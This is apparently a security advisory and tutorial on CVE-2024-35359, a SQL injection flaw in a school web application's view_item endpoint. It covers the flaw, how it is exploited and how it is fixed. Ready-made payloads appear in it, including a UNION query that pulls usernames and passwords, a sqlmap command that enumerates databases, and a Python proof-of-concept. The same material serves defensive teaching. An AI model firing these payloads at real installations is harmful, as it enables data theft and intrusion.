A SQL injection vulnerability, CVE-2024-35359, has been reported in version 2.3 of the Diño Physics School Assistant web application, a tool used by educational institutions. The flaw sits in the /classes/Master.php?f=view_item endpoint, which passes the user-supplied id parameter into a database query without validating it or binding it as a query parameter.

This guide explains the vulnerability in plain language, walks through illustrative code, shows how it can be exploited, and gives mitigation advice for developers and administrators.

- Vulnerable Version: 2.3
- Vulnerable File: /classes/Master.php?f=view_item
- Vulnerable Parameter: id

The Vulnerability in Technical Terms

The root cause is that the id parameter is neither validated nor passed to the database as a bound parameter. When a user requests a URL like:

/classes/Master.php?f=view_item&id=1

the code behind this page splices the value of id directly into the SQL text, so the database parses whatever the client sent as part of the statement.

This is a classic SQL injection: an attacker who controls id controls part of the query and can read or modify data the page was never meant to expose.

Let's look at a simplified, illustrative version of the logic inside Master.php (not the application's verbatim source):

<?php
// Simplified illustration of the vulnerable handler in Master.php.
// $conn is an existing mysqli connection.
if (isset($_GET['f'], $_GET['id']) && $_GET['f'] == 'view_item') {
    $id = $_GET['id'];
    // BAD: the raw query-string value is concatenated into the SQL text,
    // so anything the client sends becomes part of the statement.
    $query = "SELECT * FROM items WHERE id = $id";
    $result = $conn->query($query);
    // ... display results
}
?>

What’s wrong?
If a user puts anything into the id parameter (not just numbers), it will be inserted into the SQL query as-is.

An attacker could navigate to

/classes/Master.php?f=view_item&id=1 OR 1=1

(the browser or tool encodes the spaces as %20 or +, and PHP decodes them again before the value reaches the query). This changes the query to

SELECT * FROM items WHERE id = 1 OR 1=1

The WHERE clause is now always true, so every row in the items table is selected, and whatever the page does with the result (display it, process it) happens to all items.

But it gets worse. An attacker might attempt something like

/classes/Master.php?f=view_item&id=1 UNION SELECT username, password FROM users--

which appends rows from the users table to the item result. For the UNION to succeed, the injected SELECT must return the same number of columns as the items table (found by trial with ORDER BY n or by padding with NULL), and the trailing -- only matters when the original query continues after the injection point; in MySQL the double dash must also be followed by whitespace, which is why the -- - or # forms are usually used.

Full SQLi Automation

Because the parameter is injected without any filtering, automated tools such as sqlmap find and exploit it without manual work. Pointing sqlmap at the parameter:

sqlmap -u "http://example.com/classes/Master.php?f=view_item&id=1" -p id --dbs

lets an attacker enumerate database names, then tables, and dump sensitive contents.

Here is a simple boolean-based proof-of-concept in Python. It sends a baseline request, then a payload whose condition is true and one whose condition is false; if the true case matches the baseline while the false case differs, the id value is being evaluated as SQL.

import requests

url = "http://example.com/classes/Master.php"

# Boolean-based check: a true condition should return the same page as the
# plain request, a false condition a different one. Compare lengths rather
# than full bodies if the page contains dynamic content such as timestamps.
bodies = {}
for name, payload in {"base": "1", "true": "1 AND 1=1", "false": "1 AND 1=2"}.items():
    r = requests.get(url, params={"f": "view_item", "id": payload}, timeout=10)
    bodies[name] = r.text

if bodies["base"] == bodies["true"] and bodies["base"] != bodies["false"]:
    print("[+] id is evaluated as SQL: likely vulnerable to SQL injection")
else:
    print("[-] No boolean-based SQL injection detected")

Mitigation and Fix

Developers: never concatenate request values into SQL. Bind the id value with a prepared statement so the database treats it as data, and reject non-numeric values before the query runs.

Example (Using PDO)

<?php
// $conn is a PDO connection. The placeholder is filled in by the driver,
// so the supplied value can never change the structure of the statement.
$stmt = $conn->prepare('SELECT * FROM items WHERE id = ?');
$stmt->execute([$_GET['id']]);
$items = $stmt->fetchAll();
?>
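The following Python script, added here as an illustration and not taken from the page or from the Diño Physics School Assistant source, reproduces both the injection walk-through above and the prepared-statement fix against an in-memory SQLite database standing in for the application's MySQL backend. The schema, table contents and function names are constructed assumptions. It goes slightly beyond the text by showing that a UNION payload only works once its column count matches the items table.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's database.
    Table and column names are assumptions, not the project's schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (id INTEGER, name TEXT, price REAL);
        INSERT INTO items VALUES (1, 'Pendulum kit', 25.0), (2, 'Prism set', 40.0);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hashed-secret');
        """
    )
    return conn


def view_item_vulnerable(conn, item_id):
    """Mirrors the vulnerable handler: the raw id is spliced into the SQL text."""
    query = f"SELECT * FROM items WHERE id = {item_id}"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.OperationalError as exc:
        # A malformed injection (e.g. wrong UNION column count) surfaces here.
        return f"error: {exc}"


def view_item_fixed(conn, item_id):
    """Parameterized equivalent of the PDO fix: the value is bound as data,
    so a non-numeric id simply matches no row instead of altering the query."""
    query = "SELECT * FROM items WHERE id = ?"
    return conn.execute(query, (item_id,)).fetchall()


def demo():
    conn = make_db()
    results = {}
    # 1 OR 1=1 turns the WHERE clause into a tautology: every item comes back.
    results["or_vuln"] = view_item_vulnerable(conn, "1 OR 1=1")
    # items has three columns, so a two-column UNION is rejected by the engine.
    results["union_bad"] = view_item_vulnerable(
        conn, "1 UNION SELECT username, password FROM users--")
    # Padding the injected SELECT with NULL to three columns leaks users rows.
    results["union_good"] = view_item_vulnerable(
        conn, "1 UNION SELECT username, password, NULL FROM users--")
    # The same payloads against the bound query return nothing...
    results["or_fixed"] = view_item_fixed(conn, "1 OR 1=1")
    results["union_fixed"] = view_item_fixed(
        conn, "1 UNION SELECT username, password, NULL FROM users--")
    # ...while a legitimate id still works.
    results["legit_fixed"] = view_item_fixed(conn, "1")
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Running the script prints both items for the OR payload, an error for the two-column UNION, the admin credentials row for the padded UNION, and empty results for every payload sent through the parameterized query.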

Site Admins: patch or otherwise secure affected installations of version 2.3 immediately; the exploit requires nothing more than a crafted GET request.

References

- Original CVE Record (Mitre)
- SQL Injection - OWASP Explanation
- sqlmap – Automatic SQL Injection
- PDO Prepared Statements - PHP Manual

Conclusion

CVE-2024-35359 is a textbook example of why input validation and parameterized queries matter. Sites running Diño Physics School Assistant 2.3 are vulnerable to SQL injection, and the exploit takes nothing more than a crafted GET request. If you are responsible for such a system, patch or secure it immediately.

Stay safe, and always validate your inputs!

*This article is exclusive to this post and summarizes all available public details as of June 2024.*

Timeline

Published on: 05/30/2024 17:15:34 UTC
Last modified on: 08/19/2024 15:35:07 UTC